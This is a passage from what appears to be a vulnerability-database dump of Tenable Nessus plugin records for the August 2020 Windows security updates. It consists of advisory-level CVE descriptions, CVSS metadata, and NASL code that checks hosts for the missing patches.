An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when\n Windows Remote Access improperly handles memory.\n (CVE-2020-1530)\n\n - An elevation of privilege vulnerability exists when the\n Windows Remote Access improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could gain elevated privileges.\n (CVE-2020-1537)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1534)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
(CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. 
The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-1562)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. 
The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571729/windows-7-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571719/windows-7-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4571719 or Cumulative Update KB4571729.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-08';\nkbs = make_list(\n '4571729',\n '4571719'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'08_2020',\n bulletin:bulletin,\n rollup_kb_list:[4571729, 4571719])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:22:03", "description": "The remote Windows host is missing security update 4571723 or cumulative update 4571703. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. 
An attacker who successfully exploited the vulnerability could take control of an affected system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when the Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when DirectWrite improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. 
An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the Local Security Authority Subsystem Service (LSASS) when an authenticated attacker sends a specially crafted authentication request. A remote attacker who successfully exploited this vulnerability could cause an elevation of privilege on the target system's LSASS service. The security update addresses the vulnerability by changing the way that LSASS handles specially crafted authentication requests. (CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the Windows Font Driver Host improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. 
(CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system. A locally authenticated attacker could exploit this vulnerability by running a specially crafted application. The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the Windows File Server Resource Management Service improperly handles memory. (CVE-2020-1517, CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the way that the dnsrslvr.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the \"Public Account Pictures\" folder improperly handles junctions. (CVE-2020-1565)\n\n - A spoofing vulnerability exists when Windows incorrectly validates file signatures. An attacker who successfully exploited this vulnerability could bypass security features and load improperly signed files. In an attack scenario, an attacker could bypass security features intended to prevent improperly signed files from being loaded. The update addresses the vulnerability by correcting how Windows validates file signatures.\n (CVE-2020-1464)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. (CVE-2020-1472)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1379, CVE-2020-1477, CVE-2020-1478, CVE-2020-1492, CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory. 
An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the Windows Ancillary Function Driver for WinSock improperly handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558, CVE-2020-1564)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes input. An attacker who successfully exploited this vulnerability could take control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the Windows Function Discovery SSDP Provider improperly handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when ASP.NET or .NET web applications running on IIS improperly allow access to cached files. An attacker who successfully exploited this vulnerability could gain access to restricted files. (CVE-2020-1476)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1475)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "KB4571723: Windows 8.1 and Windows Server 2012 R2 August 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1046", "CVE-2020-1337", "CVE-2020-1339", "CVE-2020-1377", "CVE-2020-1378", "CVE-2020-1379", "CVE-2020-1380", "CVE-2020-1383", "CVE-2020-1464", "CVE-2020-1466", "CVE-2020-1467", "CVE-2020-1470", "CVE-2020-1472", "CVE-2020-1473", "CVE-2020-1474", "CVE-2020-1475", "CVE-2020-1476", "CVE-2020-1477", "CVE-2020-1478", "CVE-2020-1484", "CVE-2020-1485", "CVE-2020-1486", "CVE-2020-1487", "CVE-2020-1488", "CVE-2020-1489", "CVE-2020-1492", "CVE-2020-1509", "CVE-2020-1513", "CVE-2020-1515", "CVE-2020-1516", "CVE-2020-1517", "CVE-2020-1518", "CVE-2020-1519", "CVE-2020-1520", "CVE-2020-1529", "CVE-2020-1538", "CVE-2020-1552", "CVE-2020-1554", "CVE-2020-1557", "CVE-2020-1558", "CVE-2020-1562", "CVE-2020-1564", "CVE-2020-1565", "CVE-2020-1567", "CVE-2020-1570", "CVE-2020-1577", "CVE-2020-1579", "CVE-2020-1584", "CVE-2020-1587"], "modified": "2023-05-23T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_AUG_4571703.NASL", "href": "https://www.tenable.com/plugins/nessus/139489", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139489);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\n \"CVE-2020-1046\",\n \"CVE-2020-1337\",\n \"CVE-2020-1339\",\n \"CVE-2020-1377\",\n \"CVE-2020-1378\",\n \"CVE-2020-1379\",\n \"CVE-2020-1380\",\n \"CVE-2020-1383\",\n \"CVE-2020-1464\",\n \"CVE-2020-1466\",\n \"CVE-2020-1467\",\n \"CVE-2020-1470\",\n \"CVE-2020-1472\",\n \"CVE-2020-1473\",\n \"CVE-2020-1474\",\n \"CVE-2020-1475\",\n \"CVE-2020-1476\",\n \"CVE-2020-1477\",\n \"CVE-2020-1478\",\n \"CVE-2020-1484\",\n \"CVE-2020-1485\",\n \"CVE-2020-1486\",\n \"CVE-2020-1487\",\n \"CVE-2020-1488\",\n \"CVE-2020-1489\",\n \"CVE-2020-1492\",\n \"CVE-2020-1509\",\n \"CVE-2020-1513\",\n \"CVE-2020-1515\",\n \"CVE-2020-1516\",\n \"CVE-2020-1517\",\n \"CVE-2020-1518\",\n \"CVE-2020-1519\",\n \"CVE-2020-1520\",\n \"CVE-2020-1529\",\n \"CVE-2020-1538\",\n \"CVE-2020-1552\",\n \"CVE-2020-1554\",\n \"CVE-2020-1557\",\n \"CVE-2020-1558\",\n \"CVE-2020-1562\",\n \"CVE-2020-1564\",\n \"CVE-2020-1565\",\n \"CVE-2020-1567\",\n \"CVE-2020-1570\",\n \"CVE-2020-1577\",\n \"CVE-2020-1579\",\n \"CVE-2020-1584\",\n \"CVE-2020-1587\"\n );\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"IAVA\", value:\"2020-A-0367-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"MSKB\", value:\"4571703\");\n script_xref(name:\"MSKB\", value:\"4571723\");\n script_xref(name:\"MSFT\", value:\"MS20-4571703\");\n script_xref(name:\"MSFT\", value:\"MS20-4571723\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", 
value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"KB4571723: Windows 8.1 and Windows Server 2012 R2 August 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4571723\nor cumulative update 4571703. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Media Audio Codec improperly handles objects. An\n attacker who successfully exploited the vulnerability\n could take control of an affected system. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media Audio\n Codec handles objects. (CVE-2020-1339)\n\n - An elevation of privilege vulnerability exists when the\n Windows Telephony Server improperly handles memory.\n (CVE-2020-1515)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. 
There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2020-1577)\n\n - An information disclosure vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system (CVE-2020-1383)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folders Service improperly handles memory.\n (CVE-2020-1470, CVE-2020-1484, CVE-2020-1516)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-1489, CVE-2020-1513)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-1467)\n\n - A denial of service vulnerability exists in Windows\n Remote Desktop Gateway (RD Gateway) when an attacker\n connects to the target system using RDP and sends\n specially crafted requests. An attacker who successfully\n exploited this vulnerability could cause the RD Gateway\n service on the target system to stop responding.\n (CVE-2020-1466)\n\n - An elevation of privilege vulnerability exists in the\n Local Security Authority Subsystem Service (LSASS) when\n an authenticated attacker sends a specially crafted\n authentication request. A remote attacker who\n successfully exploited this vulnerability could cause an\n elevation of privilege on the target system's LSASS\n service. The security update addresses the vulnerability\n by changing the way that LSASS handles specially crafted\n authentication requests. 
(CVE-2020-1509)\n\n - A remote code execution vulnerability exists when the\n Windows Font Driver Host improperly handles memory. An\n attacker who successfully exploited the vulnerability\n would gain execution on a victim system. The security\n update addresses the vulnerability by correcting how the\n Windows Font Driver Host handles memory. (CVE-2020-1520)\n\n - An elevation of privilege vulnerability exists when the\n Windows UPnP Device Host improperly handles memory.\n (CVE-2020-1519, CVE-2020-1538)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1552)\n\n - An elevation of privilege vulnerability exists when the\n Windows Kernel API improperly handles registry objects\n in memory. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a\n targeted system. A locally authenticated attacker could\n exploit this vulnerability by running a specially\n crafted application. The security update addresses the\n vulnerability by helping to ensure that the Windows\n Kernel API properly handles objects in memory.\n (CVE-2020-1377, CVE-2020-1378)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1487)\n\n - An elevation of privilege vulnerability exists when the\n Windows File Server Resource Management Service\n improperly handles memory. 
(CVE-2020-1517,\n CVE-2020-1518)\n\n - An elevation of privilege vulnerability exists in the\n way that the dnsrslvr.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1584)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-1565)\n\n - A spoofing vulnerability exists when Windows incorrectly\n validates file signatures. An attacker who successfully\n exploited this vulnerability could bypass security\n features and load improperly signed files. In an attack\n scenario, an attacker could bypass security features\n intended to prevent improperly signed files from being\n loaded. The update addresses the vulnerability by\n correcting how Windows validates file signatures.\n (CVE-2020-1464)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1486)\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC). An attacker who\n successfully exploited the vulnerability could run a\n specially crafted application on a device on the\n network. (CVE-2020-1472)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. 
There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1379,\n CVE-2020-1477, CVE-2020-1478, CVE-2020-1492,\n CVE-2020-1554)\n\n - An elevation of privilege vulnerability exists when the\n Windows Print Spooler service improperly allows\n arbitrary writing to the file system. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-1337)\n\n - An information disclosure vulnerability exists when the\n Windows Image Acquisition (WIA) Service improperly\n discloses contents of its memory. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2020-1474, CVE-2020-1485)\n\n - An elevation of privilege vulnerability exists when the\n Windows Ancillary Function Driver for WinSock improperly\n handles memory. (CVE-2020-1587)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1473, CVE-2020-1557, CVE-2020-1558,\n CVE-2020-1564)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes input. 
An attacker\n who successfully exploited this vulnerability could take\n control of an affected system. (CVE-2020-1046)\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-1529)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2020-1488)\n\n - An elevation of privilege vulnerability exists when the\n Windows Function Discovery SSDP Provider improperly\n handles memory. (CVE-2020-1579)\n\n - An elevation of privilege vulnerability exists when\n ASP.NET or .NET web applications running on IIS\n improperly allow access to cached files. An attacker who\n successfully exploited this vulnerability could gain\n access to restricted files. (CVE-2020-1476)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. 
(CVE-2020-1562)\n\n - An elevation of privilege vulnerability exists in the\n way that the srmsvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1475)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571723/windows-8-1-update\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571703/windows-8-1-update\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4571723 or Cumulative Update KB4571703.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1564\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Spooler Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
